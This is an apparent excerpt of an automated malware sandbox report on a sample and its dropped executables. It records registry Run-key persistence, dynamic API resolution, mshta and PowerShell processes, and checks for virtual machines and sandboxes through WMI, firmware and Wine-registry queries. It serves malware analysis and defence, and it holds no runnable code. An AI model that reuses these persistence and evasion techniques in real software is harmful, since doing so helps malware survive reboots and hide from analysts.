Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cefa09b2a4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 977b4d66ef.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 977b4d66ef.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009D90ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009D90ED

Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
